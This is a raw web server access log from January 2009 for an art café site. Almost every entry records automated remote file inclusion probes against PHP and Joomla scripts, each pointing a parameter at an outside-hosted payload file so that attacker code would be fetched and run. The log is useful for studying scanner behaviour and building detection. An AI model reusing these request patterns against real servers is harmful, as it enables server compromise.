85.17.137.41 - - [04/Jan/2009:17:45:27 -0800] "GET /logs/access.log%20%20/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
222.121.123.91 - - [04/Jan/2009:17:45:43 -0800] "GET /logs/access.log//main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
222.121.123.91 - - [04/Jan/2009:17:45:43 -0800] "GET /logs//main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
222.121.123.91 - - [04/Jan/2009:17:45:43 -0800] "GET /main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
194.0.252.2 - - [04/Jan/2009:17:46:07 -0800] "GET /logs/access.log%20%20/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
211.115.213.156 - - [04/Jan/2009:17:46:07 -0800] "GET /logs/access.log//main.php?sayfa=http://www.leegolf.com/vboard/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
211.115.213.156 - - [04/Jan/2009:17:46:08 -0800] "GET /main.php?sayfa=http://www.leegolf.com/vboard/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
211.115.213.156 - - [04/Jan/2009:17:46:09 -0800] "GET /logs//main.php?sayfa=http://www.leegolf.com/vboard/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
91.196.124.16 - - [04/Jan/2009:17:46:13 -0800] "GET /logs/access.log%20%20/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
222.121.123.91 - - [04/Jan/2009:17:46:47 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
77.221.130.16 - - [04/Jan/2009:17:47:14 -0800] "GET /main.php?sayfa=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
85.17.137.41 - - [04/Jan/2009:17:50:41 -0800] "GET /logs/access.log%20%20/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
97.66.79.173 - - [04/Jan/2009:17:50:46 -0800] "GET /main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
97.66.79.173 - - [04/Jan/2009:17:50:47 -0800] "GET /logs/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
97.66.79.173 - - [04/Jan/2009:17:50:47 -0800] "GET /logs/access.log/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
85.17.137.41 - - [04/Jan/2009:17:50:47 -0800] "GET /logs/access.log%20%20/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
66.160.185.20 - - [04/Jan/2009:17:52:57 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
70.86.130.2 - - [04/Jan/2009:17:56:25 -0800] "GET /logs/access.log/errors.php?error=http://www.autismcenter.or.kr/cgi-bin/files/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
70.86.130.2 - - [04/Jan/2009:17:56:25 -0800] "GET /errors.php?error=http://www.autismcenter.or.kr/cgi-bin/files/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
70.86.130.2 - - [04/Jan/2009:17:56:25 -0800] "GET /logs/errors.php?error=http://www.autismcenter.or.kr/cgi-bin/files/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
208.80.194.50 - - [04/Jan/2009:17:59:13 -0800] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; SeekmoToolbar 4.8.4)" "imagineartcafe.com"
97.66.79.173 - - [04/Jan/2009:17:59:52 -0800] "GET /logs/access.log%20%20/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
65.98.75.107 - - [04/Jan/2009:18:20:44 -0800] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
65.98.75.107 - - [04/Jan/2009:18:20:44 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
65.98.75.107 - - [04/Jan/2009:18:20:44 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
128.121.79.26 - - [04/Jan/2009:18:21:10 -0800] "GET /logs//?include_path=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 200 1086 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
128.121.79.26 - - [04/Jan/2009:18:21:10 -0800] "GET /logs/access.log//?include_path=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
128.121.79.26 - - [04/Jan/2009:18:21:10 -0800] "GET /?include_path=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 200 779 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
66.7.194.31 - - [04/Jan/2009:18:21:37 -0800] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
66.7.194.31 - - [04/Jan/2009:18:21:37 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
66.7.194.31 - - [04/Jan/2009:18:21:37 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
85.236.53.4 - - [04/Jan/2009:18:21:42 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
85.236.53.4 - - [04/Jan/2009:18:21:42 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
85.236.53.4 - - [04/Jan/2009:18:21:42 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
81.176.232.101 - - [04/Jan/2009:18:21:52 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
81.176.232.101 - - [04/Jan/2009:18:21:52 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
81.176.232.101 - - [04/Jan/2009:18:21:52 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
81.176.232.101 - - [04/Jan/2009:18:21:58 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
81.176.232.101 - - [04/Jan/2009:18:21:58 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
81.176.232.101 - - [04/Jan/2009:18:21:58 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
85.233.166.227 - - [04/Jan/2009:18:22:07 -0800] "GET //home.php?pagina=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
81.208.9.229 - - [04/Jan/2009:18:22:25 -0800] "GET /?sIncPath=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.imagineartcafe.com"
81.208.9.229 - - [04/Jan/2009:18:22:25 -0800] "GET /logs/access.log//?sIncPath=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.imagineartcafe.com"
81.208.9.229 - - [04/Jan/2009:18:22:25 -0800] "GET /logs//?sIncPath=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 200 1086 "-" "libwww-perl/5.803" "www.imagineartcafe.com"
89.36.39.203 - - [04/Jan/2009:18:22:30 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.imagineartcafe.com"
85.233.166.227 - - [04/Jan/2009:18:24:57 -0800] "GET /logs/access.log///home.php?pagina=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
85.233.166.227 - - [04/Jan/2009:18:24:57 -0800] "GET //home.php?pagina=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
85.233.166.227 - - [04/Jan/2009:18:24:57 -0800] "GET /logs///home.php?pagina=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
208.111.154.16 - - [04/Jan/2009:18:25:32 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.imagineartcafe.com"
208.111.154.16 - - [04/Jan/2009:18:25:32 -0800] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.imagineartcafe.com"
200.198.92.34 - - [04/Jan/2009:18:26:32 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.caverna.kit.net/z1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.imagineartcafe.com"
200.198.92.34 - - [04/Jan/2009:18:26:32 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.caverna.kit.net/z1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.imagineartcafe.com"
200.198.92.34 - - [04/Jan/2009:18:26:32 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.caverna.kit.net/z1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.imagineartcafe.com"
85.233.166.227 - - [04/Jan/2009:18:27:16 -0800] "GET /logs///home.php?pagina=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
85.233.166.227 - - [04/Jan/2009:18:27:16 -0800] "GET //home.php?pagina=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
91.142.214.201 - - [04/Jan/2009:18:27:44 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
91.142.214.201 - - [04/Jan/2009:18:27:58 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
91.142.214.201 - - [04/Jan/2009:18:27:58 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
77.221.130.8 - - [04/Jan/2009:18:32:37 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://business-buket.ru/img/jr/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
77.221.130.8 - - [04/Jan/2009:18:32:37 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://business-buket.ru/img/jr/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
77.221.130.8 - - [04/Jan/2009:18:32:37 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://business-buket.ru/img/jr/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
77.221.130.8 - - [04/Jan/2009:18:32:37 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://juninhor0x2009.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
77.221.130.8 - - [04/Jan/2009:18:32:37 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://juninhor0x2009.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
77.221.130.8 - - [04/Jan/2009:18:32:37 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://juninhor0x2009.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
211.235.245.121 - - [04/Jan/2009:18:33:43 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
211.235.245.121 - - [04/Jan/2009:18:33:43 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
211.235.245.121 - - [04/Jan/2009:18:33:43 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
77.221.130.8 - - [04/Jan/2009:18:35:00 -0800] "GET /logs/access.log%20/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://juninhor0x2009.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
77.221.130.8 - - [04/Jan/2009:18:35:22 -0800] "GET /logs/access.log%20/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://business-buket.ru/img/jr/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
208.69.192.200 - - [04/Jan/2009:18:37:43 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
208.69.192.200 - - [04/Jan/2009:18:37:43 -0800] "GET /config/dbutil.bck.php?confdir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
202.60.67.10 - - [04/Jan/2009:18:38:57 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://mhasbi.com/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
202.60.67.10 - - [04/Jan/2009:18:38:57 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://mhasbi.com/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
202.60.67.10 - - [04/Jan/2009:18:38:57 -0800] "GET /logs/access.log%20%20/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://mhasbi.com/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
85.214.51.146 - - [04/Jan/2009:18:39:20 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.imagineartcafe.com"
128.121.79.26 - - [04/Jan/2009:18:42:27 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
128.121.79.26 - - [04/Jan/2009:18:42:27 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
66.160.185.20 - - [04/Jan/2009:18:43:22 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
66.160.185.20 - - [04/Jan/2009:18:43:23 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
128.121.79.26 - - [04/Jan/2009:18:43:43 -0800] "GET /logs//errors.php?error=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
128.121.79.26 - - [04/Jan/2009:18:43:44 -0800] "GET /errors.php?error=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
202.60.67.10 - - [04/Jan/2009:18:43:58 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://mhasbi.com/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
190.128.163.42 - - [04/Jan/2009:18:44:20 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://spotlyrics.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
190.128.163.42 - - [04/Jan/2009:18:44:20 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://spotlyrics.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
190.128.163.42 - - [04/Jan/2009:18:44:22 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://spotlyrics.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
208.69.192.200 - - [04/Jan/2009:18:49:55 -0800] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
208.69.192.200 - - [04/Jan/2009:18:49:55 -0800] "GET /config/dbutil.bck.php?confdir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
208.69.192.200 - - [04/Jan/2009:18:49:55 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
208.69.192.200 - - [04/Jan/2009:18:52:59 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
208.69.192.200 - - [04/Jan/2009:18:53:00 -0800] "GET /config/dbutil.bck.php?confdir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
208.69.192.200 - - [04/Jan/2009:18:56:45 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
208.69.192.200 - - [04/Jan/2009:18:56:45 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
85.236.53.4 - - [04/Jan/2009:19:00:29 -0800] "GET /logs/access.log//?spaw_root=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
85.236.53.4 - - [04/Jan/2009:19:00:29 -0800] "GET /?spaw_root=http://plainsimple.org/test/id.txt????? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
85.236.53.4 - - [04/Jan/2009:19:00:29 -0800] "GET /logs//?spaw_root=http://plainsimple.org/test/id.txt????? HTTP/1.1" 200 1086 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
208.69.192.200 - - [04/Jan/2009:19:03:50 -0800] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
208.69.192.200 - - [04/Jan/2009:19:03:50 -0800] "GET /config/dbutil.bck.php?confdir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
208.69.192.200 - - [04/Jan/2009:19:03:50 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
91.142.214.201 - - [04/Jan/2009:19:07:11 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/budisirna/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.imagineartcafe.com"
91.142.214.201 - - [04/Jan/2009:19:07:11 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.imagineartcafe.com"
91.142.214.201 - - [04/Jan/2009:19:07:11 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.imagineartcafe.com"
91.142.214.201 - - [04/Jan/2009:19:07:11 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.imagineartcafe.com"
91.142.214.201 - - [04/Jan/2009:19:07:11 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/budisirna/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.imagineartcafe.com"
91.142.214.201 - - [04/Jan/2009:19:07:11 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/budisirna/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.imagineartcafe.com"
222.236.47.182 - - [04/Jan/2009:19:11:56 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
222.236.47.182 - - [04/Jan/2009:19:11:56 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
222.236.47.182 - - [04/Jan/2009:19:11:56 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
200.199.205.47 - - [04/Jan/2009:19:17:42 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.caverna.kit.net/scans/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.imagineartcafe.com"
200.199.205.47 - - [04/Jan/2009:19:17:42 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.caverna.kit.net/scans/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.imagineartcafe.com"
200.199.205.47 - - [04/Jan/2009:19:17:42 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.caverna.kit.net/scans/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.imagineartcafe.com"
66.160.185.20 - - [04/Jan/2009:19:28:06 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
208.69.192.200 - - [04/Jan/2009:19:29:39 -0800] "GET /logs/class_item.php?fileExtension=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
